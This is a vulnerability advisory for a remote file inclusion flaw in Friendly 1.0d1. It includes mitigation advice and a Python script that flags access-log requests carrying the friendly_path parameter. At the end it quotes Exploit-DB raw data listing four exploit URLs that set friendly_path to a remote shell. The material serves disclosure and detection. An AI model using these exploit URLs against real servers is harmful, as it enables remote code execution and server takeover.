Vendor: Friendly
By: GolD_M = [Mahmood_ali] (no additional information provided)
CVSS: 7.5 (HIGH)
CWE: Remote File Inclusion
Product Name: Friendly
Affected Version From: Friendly 1.0d1
Affected Version To: Friendly 1.0d1
Patch Exists: NO
Platforms Tested:
2007

Friendly 1.0d1 (friendly_path) Remote File Inclusion Vulnerabilities

The vulnerability allows an attacker to include a remote file by manipulating the 'friendly_path' parameter in the specified URLs. This can lead to remote code execution and unauthorized access to the server.

Mitigation:

The vendor should release a patch or update to fix the vulnerability. In the meantime, users are advised to restrict access to the affected URLs and implement input validation to prevent malicious file inclusion.
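
While no patch exists, web-server access logs can be reviewed for requests that reach the four listed scripts with friendly_path supplied in the query string. The following is an added example, not part of the original advisory or of Friendly itself; it assumes common/combined log format, and the names classify, scan and SAMPLE_LOG are hypothetical.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Script paths listed in the advisory, relative to the install root ([Path]).
AFFECTED = (
    "/_friendly/core/data/_load.php",
    "/_friendly/core/data/yaml.inc.php",
    "/_friendly/core/display/_load.php",
    "/_friendly/core/support/_load.php",
)
# Request field of a common/combined access-log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# A value naming a remote resource: scheme://... or protocol-relative //host
REMOTE_RE = re.compile(r"^(?:[a-z][a-z0-9+.-]*:)?//", re.I)

def classify(line):
    """Return None, 'param-supplied' or 'remote-value' for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    if not target.path.lower().endswith(AFFECTED):
        return None
    # parse_qs percent-decodes each value once, so http%3A%2F%2F is seen as http://
    values = parse_qs(target.query, keep_blank_values=True).get("friendly_path")
    if values is None:
        return None
    if any(REMOTE_RE.match(v.strip()) for v in values):
        return "remote-value"
    return "param-supplied"

def scan(lines):
    """Return (line_number, verdict) for every flagged line."""
    verdicts = ((n, classify(line)) for n, line in enumerate(lines, 1))
    return [(n, v) for n, v in verdicts if v]

# Constructed sample lines (documentation addresses, placeholder host).
SAMPLE_LOG = [
    '192.0.2.10 - - [06/May/2007:10:00:01 +0000] "GET /site/index.php HTTP/1.1" 200 512',
    '192.0.2.10 - - [06/May/2007:10:00:02 +0000] "GET /site/_friendly/core/data/_load.php HTTP/1.1" 200 0',
    '198.51.100.7 - - [06/May/2007:10:00:03 +0000] "GET /site/_friendly/core/display/_load.php?friendly_path=lib HTTP/1.1" 200 0',
    '198.51.100.7 - - [06/May/2007:10:00:04 +0000] "GET /site/_friendly/core/data/yaml.inc.php?friendly_path=http%3A%2F%2Fexample.invalid%2Fa.txt HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for n, verdict in scan(SAMPLE_LOG):
        print(f"line {n}: {verdict}")
```

Access logs record only the query string, so a parameter delivered in a request body would not be seen by this check.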

Exploit-DB raw data:

# Friendly 1.0d1 (friendly_path)Remote File Inclusion Vulnerabilities
# D.Script: http://friendlyphp.org/downloads/
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Exploit:[Path]/_friendly/core/data/_load.php?friendly_path=shell
# Exploit:[Path]/_friendly/core/data/yaml.inc.php?friendly_path=shell
# Exploit:[Path]/_friendly/core/display/_load.php?friendly_path=shell
# Exploit:[Path]/_friendly/core/support/_load.php?friendly_path=shell
# Greetz To: Tryag-Team ....##

# milw0rm.com [2007-05-06]